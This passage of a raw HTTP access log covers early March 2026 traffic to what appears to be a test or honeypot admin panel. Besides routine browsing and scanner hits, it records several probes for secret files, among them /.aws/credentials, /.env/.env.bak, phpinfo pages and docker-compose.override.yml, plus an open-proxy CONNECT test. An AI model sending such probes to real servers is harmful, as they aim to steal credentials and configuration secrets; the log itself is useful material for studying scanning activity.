Sec-Ch-Ua-Platform: "macOS"
Accept-Encoding: gzip, deflate, br, zstd
Via: 2.0 Caddy
Sec-Fetch-Dest: script
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-For: 178.120.10.109
Sec-Fetch-Site: same-origin
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37078
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-03 11:16:29] === HTTP Request ===
===================
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/login
Priority: u=1
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Sec-Fetch-Dest: script
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
X-Forwarded-For: 178.120.10.109
Sec-Fetch-Mode: no-cors
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Mobile: ?0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37078
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-03 11:16:29] === HTTP Request ===
===================
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Referer: https://admin.vulnberries.ru/login
X-Forwarded-Proto: https
X-Forwarded-For: 178.120.10.109
Sec-Fetch-Site: same-origin
Priority: u=0
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept: text/css,*/*;q=0.1
Sec-Ch-Ua-Mobile: ?0
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37078
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-03 11:16:29] === HTTP Request ===
[2026-03-03 11:16:29] Login page accessed - IP: 172.30.0.12:37078
===================
X-Forwarded-For: 178.120.10.109
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Priority: u=0, i
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: document
Via: 2.0 Caddy
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37078
Path: /login
URL: /login
Method: GET
[2026-03-03 11:16:29] === HTTP Request ===
[2026-03-03 10:55:53] Main page accessed - IP: 172.30.0.12:41898
===================
Accept-Language: en-US,en;q=0.9
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 104.236.252.248
Via: 1.1 Caddy
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41898
Path: /
URL: /
Method: GET
[2026-03-03 10:55:53] === HTTP Request ===
[2026-03-03 10:09:23] Main page accessed - IP: 198.235.24.234:64166
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.234:64166
Path: /
URL: /
Method: GET
[2026-03-03 10:09:23] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.26.37.105:58504
Path: /config.json
URL: /config.json
Method: GET
[2026-03-03 09:54:12] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.26.37.105:58502
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-03 09:54:12] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.26.37.105:58498
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-03 09:54:12] === HTTP Request ===
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.26.37.105:58494
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-03 09:54:11] === HTTP Request ===
===================
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.26.37.105:58486
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-03 09:54:11] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.26.37.105:58470
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-03 09:54:10] === HTTP Request ===
[2026-03-03 09:53:52] Main page accessed - IP: 118.26.37.105:38242
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.26.37.105:38242
Path: /
URL: /
Method: GET
[2026-03-03 09:53:52] === HTTP Request ===
[2026-03-03 09:45:06] Main page accessed - IP: 35.189.227.206:49452
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.189.227.206:49452
Path: /
URL: /
Method: GET
[2026-03-03 09:45:06] === HTTP Request ===
[2026-03-03 09:19:35] Main page accessed - IP: 172.30.0.12:58470
===================
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 198.235.24.128
Via: 1.1 Caddy
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:58470
Path: /
URL: /
Method: GET
[2026-03-03 09:19:35] === HTTP Request ===
[2026-03-03 09:08:10] Main page accessed - IP: 185.247.137.214:57871
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 185.247.137.214:57871
Path: /
URL: /
Method: GET
[2026-03-03 09:08:10] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 36.77.30.228
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60998
Path: /.aws/credentials
URL: /.aws/credentials
Method: GET
[2026-03-03 07:42:15] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 36.77.30.228
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60998
Path: /index.php
URL: /index.php
Method: GET
[2026-03-03 07:42:13] === HTTP Request ===
[2026-03-03 07:42:12] Main page accessed - IP: 172.30.0.12:60998
===================
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 36.77.30.228
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60998
Path: /
URL: /
Method: GET
[2026-03-03 07:42:12] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 36.77.30.228
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60998
Path: /.env/.env.bak
URL: /.env/.env.bak
Method: GET
[2026-03-03 07:42:11] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 36.77.30.228
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60998
Path: /_profiler/phpinfo
URL: /_profiler/phpinfo
Method: GET
[2026-03-03 07:42:10] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 36.77.30.228
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60998
Path: /test.php
URL: /test.php
Method: GET
[2026-03-03 07:42:09] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 36.77.30.228
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60998
Path: /phpinfo.php
URL: /phpinfo.php
Method: GET
[2026-03-03 07:42:08] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-httpx/0.28.1
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 36.77.30.228
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60998
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-03 07:42:07] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-httpx/0.28.1
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 36.77.30.228
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60998
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-03 07:42:06] === HTTP Request ===
[2026-03-03 07:42:05] Main page accessed - IP: 172.30.0.12:60998
===================
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 36.77.30.228
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60998
Path: /
URL: /
Method: GET
[2026-03-03 07:42:05] === HTTP Request ===
===================
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.228.0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:59760
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-03 06:33:55] === HTTP Request ===
[2026-03-03 06:30:37] Main page accessed - IP: 147.185.132.43:61488
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: dns.bakunin.me
RemoteAddr: 147.185.132.43:61488
Path: /
URL: /
Method: GET
[2026-03-03 06:30:37] === HTTP Request ===
[2026-03-03 06:24:04] Main page accessed - IP: 176.65.149.45:36172
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:36172
Path: /
URL: /
Method: GET
[2026-03-03 06:24:04] === HTTP Request ===
===================
Proxy-Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: example.com:443
RemoteAddr: 45.135.193.67:44996
Path:
URL: //example.com:443
Method: CONNECT
[2026-03-03 05:27:28] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50032
Path: /docker-compose.override.yml
URL: /docker-compose.override.yml
Method: GET
[2026-03-03 05:12:07] === HTTP Request ===
[2026-03-03 02:43:08] Main page accessed - IP: 176.65.149.45:39526
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:39526
Path: /
URL: /
Method: GET
[2026-03-03 02:43:08] === HTTP Request ===
===================
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:32822
Path: /jars
URL: /jars
Method: GET
[2026-03-03 01:22:07] === HTTP Request ===
[2026-03-03 00:51:35] Main page accessed - IP: 147.185.132.25:49395
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept: */*
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 147.185.132.25:49395
Path: /
URL: /
Method: GET
[2026-03-03 00:51:35] === HTTP Request ===
[2026-03-02 22:12:43] Main page accessed - IP: 139.59.170.85:40110
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 139.59.170.85:40110
Path: /
URL: /
Method: GET
[2026-03-02 22:12:43] === HTTP Request ===
[2026-03-02 21:50:11] Login page accessed - IP: 92.100.247.49:53536
===================
Priority: u=0, i
Upgrade-Insecure-Requests: 1
Referer: http://95.143.191.38:8081/
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 92.100.247.49:53536
Path: /login
URL: /login
Method: GET
[2026-03-02 21:50:11] === HTTP Request ===
===================
Priority: u=6
Referer: http://95.143.191.38:8081/
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 92.100.247.49:53536
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-02 21:50:11] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0
Referer: http://95.143.191.38:8081/
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 92.100.247.49:53536
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-02 21:50:10] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081/
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 92.100.247.49:53530
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-02 21:50:10] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0
Priority: u=2
Referer: http://95.143.191.38:8081/
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 92.100.247.49:53508
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-02 21:50:10] === HTTP Request ===
[2026-03-02 21:50:10] Main page accessed - IP: 92.100.247.49:53508
===================
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0
Priority: u=0, i
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 92.100.247.49:53508
Path: /
URL: /
Method: GET
[2026-03-02 21:50:10] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.196.152.115:43059
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-02 21:33:13] === HTTP Request ===
[2026-03-02 21:30:40] Main page accessed - IP: 91.196.152.27:46279
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept-Language: en-US,en;q=0.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.196.152.27:46279
Path: /
URL: /
Method: GET
[2026-03-02 21:30:40] === HTTP Request ===
[2026-03-02 21:26:56] Main page accessed - IP: 147.185.132.231:59488
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: anzan.tech
RemoteAddr: 147.185.132.231:59488
Path: /
URL: /
Method: GET
[2026-03-02 21:26:56] === HTTP Request ===
[2026-03-02 21:00:46] Login page accessed - IP: 176.65.139.44:41750
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.139.44:41750
Path: /login
URL: /login
Method: GET
[2026-03-02 21:00:46] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50022
Path: /config.js
URL: /config.js
Method: GET
[2026-03-02 17:25:49] === HTTP Request ===
[2026-03-02 16:46:26] Main page accessed - IP: 207.90.244.22:45016
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.22:45016
Path: /
URL: /
Method: GET
[2026-03-02 16:46:26] === HTTP Request ===
===================
X-Forwarded-Proto: https
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.241.148
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:38520
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-02 14:58:24] === HTTP Request ===
[2026-03-02 14:01:47] Main page accessed - IP: 172.30.0.12:55206
===================
X-Forwarded-For: 136.119.171.25
Via: 2.0 Caddy
Referer: http://admin.vulnberries.ru
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55206
Path: /
URL: /
Method: GET
[2026-03-02 14:01:47] === HTTP Request ===
[2026-03-02 13:45:07] Main page accessed - IP: 176.65.149.45:57732
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:57732
Path: /
URL: /
Method: GET
[2026-03-02 13:45:07] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/login
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:61911
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-02 13:36:54] === HTTP Request ===
[2026-03-02 13:36:54] Login page accessed - IP: 178.141.77.200:61911
===================
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:61911
Path: /login
URL: /login
Method: GET
[2026-03-02 13:36:54] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081/
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:61911
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-02 13:36:54] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:51716
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-02 13:36:54] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/css,*/*;q=0.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:60038
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-02 13:36:54] === HTTP Request ===
[2026-03-02 13:36:54] Main page accessed - IP: 178.141.77.200:60038
===================
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
